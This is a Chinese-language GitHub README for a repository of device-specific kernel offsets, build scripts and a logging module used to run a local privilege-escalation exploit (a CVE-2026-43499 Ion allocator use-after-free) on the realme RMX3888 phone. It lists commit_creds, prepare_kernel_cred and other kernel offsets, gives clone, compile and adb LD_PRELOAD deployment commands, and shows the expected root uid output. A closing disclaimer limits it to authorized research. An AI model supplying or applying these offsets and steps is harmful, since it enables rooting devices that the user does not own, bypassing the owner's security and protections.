Bailan766/rmx3888-cve-2026-43499-config
GitHub: Bailan766/rmx3888-cve-2026-43499-config
为 realme RMX3888 设备提供 CVE-2026-43499 内核漏洞利用的完整设备专属偏移量配置、编译脚本和实时日志模块。
Stars: 0 | Forks: 0
# CVE-2026-43499 漏洞利用配置 (针对 realme RMX3888)
## 设备信息
- **品牌/型号**:realme RMX3888
- **Android 版本**:16 (SDK 36)
- **Build ID**:BP2A.250605.015
- **内核**:Linux 6.1.141-android14-11-o-gffc54a6d2287
- **SoC**:Qualcomm SM8650 (Snapdragon 8 Gen 3)
- **架构**:ARM64 (aarch64)
## 概述
本仓库包含针对 realme RMX3888 设备的 CVE-2026-43499 (GhostLock) 漏洞利用的完整配置文件。所有内核偏移量均已从设备的 boot.img 中提取并验证。
## 功能
✓ 从 vmlinux 中提取了 **20 个已验证的内核偏移量**
✓ **实时日志记录**,使用 O_SYNC + fsync 确保在发生内核 panic 时的安全性
✓ 针对 RMX3888 的**设备专属配置**
✓ 带有 NDK 自动检测的**一键编译脚本**
✓ 包含构建指南的**全面文档**
## 包含的文件
### 配置文件
- arget.h - 设备专属内核偏移量(20 个已验证的偏移量)
- common.h - 包含日志集成的构建配置
- ealtime_log.h - 实时日志记录实现
### 文档
- BUILD_GUIDE.md - 完整的编译指南
- eport.md - 详细的分析报告(第一阶段)
- ound2_report.md - 配置报告(第二阶段)
- ROUND2_STATUS.md - 执行状态摘要
- compile_status.json - 机器可读的构建状态
### 脚本
- compile_rmx3888.sh - 一键编译脚本
## 快速开始
### 前置条件
- Android NDK r26d 或更高版本
- Linux/WSL 或 Termux 环境
- CVE-2026-43499 漏洞利用源代码
### 编译
`ash
# 1. 克隆 CVE-2026-43499 漏洞利用仓库
git clone https://github.com/NebuSec/CyberMeowfia.git
cd CyberMeowfia/IonStack/CVE-2026-43499/exploit
# 2. 复制配置文件
cp /path/to/this/repo/* src/targets/rmx3888-BP2A.250605.015/
cp /path/to/this/repo/realtime_log.h src/
cp /path/to/this/repo/compile_rmx3888.sh .
# 3. 设置 Android NDK
export ANDROID_NDK_HOME=/path/to/android-ndk-r26d
# 4. 编译
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
`
### 用法
`ash
# 推送到设备
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# 设置权限
adb shell chmod 755 /data/local/tmp/preload.so
# 执行漏洞利用
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# 检查日志
adb shell cat /sdcard/Download/log_*.txt
`
## 关键偏移量
所有偏移量均已验证并从内核 6.1.141 中提取:
`c
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (偏移量: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (偏移量: 0x001e9df0)
// ... 其他 15 个已验证的偏移量
`
## 日志功能
集成的实时日志记录模块提供:
- **主日志路径**:/sdcard/Download/log_.txt
- **备用路径**:/data/local/tmp/log_.txt
- **内核 panic 安全**:使用 O_SYNC + fsync() 立即写入磁盘
- **带时间戳的条目**:所有日志条目均包含精确的时间戳
- **stderr 镜像**:日志同时输出到 stderr,便于 adb logcat 查看
## 预期结果
### 漏洞利用成功
`
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
`
### 日志文件输出
# `
=== CVE-2026-43499 漏洞利用日志已启动 ===
时间: 2026-07-23 18:00:00
PID: 12345
UID: 2000
日志路径: /sdcard/Download/log_20260723_180000.txt
[18:00:01] [*] 开始漏洞利用...
[18:00:02] [+] 内核基址已泄露: 0xffffffc008000000
[18:00:03] [*] 正在准备堆喷射 (heap spray)...
...
`
## 故障排除
有关详细的故障排除说明,请参阅 BUILD_GUIDE.md,内容包括:
- 编译错误
- 运行时崩溃
- KASLR 绕过问题
- SELinux 策略拦截
## 安全提示
⚠️ **警告**:此配置仅供授权的安全研究使用。
- 请仅在您拥有的设备上使用
- 未经授权,请勿分发编译后的二进制文件
- 遵守负责任的漏洞披露规范
- 日志文件可能包含敏感的系统信息
## 技术细节
### 提取过程
1. 使用 Android Boot Image v4 解析器解包 Boot.img
2. 使用 vmlinux-to-elf 提取 vmlinux (102,871 个符号)
3. 解析并分析了 99,580 个有效符号
4. 交叉验证了 20 个关键偏移量
5. 通过符号地址一致性检查验证偏移量
### 偏移量验证
- 已确认内核基址:0xffffffc008000000
- 所有符号地址均根据内存布局进行了验证
- 与参考设备 (Google Pixel tokay) 进行了交叉比对
- 100% 提取成功率 (20/20 个偏移量)
## 参考
- **CVE-2026-43499**:GhostLock - Ion 分配器 UAF 漏洞
- **漏洞利用源码**:https://github.com/NebuSec/CyberMeowfia
- **目标设备**:realme RMX3888 (Snapdragon 8 Gen 3)
## 许可证
此配置仅供教育和安全研究目的提供。
## 免责声明
本仓库包含安全研究资料。作者和贡献者对任何滥用此代码或由此造成的损害概不负责。使用风险自负,且仅在您拥有或获得明确授权进行测试的设备上使用。
**生成时间**:2026-07-23
**内核版本**:6.1.141-android14-11-o-gffc54a6d2287
**偏移量验证**:100% (20/20)
**状态**:准备编译
标签:Android安全, Cutter, Web报告查看器, 内核提权, 客户端加密, 目录枚举, 移动安全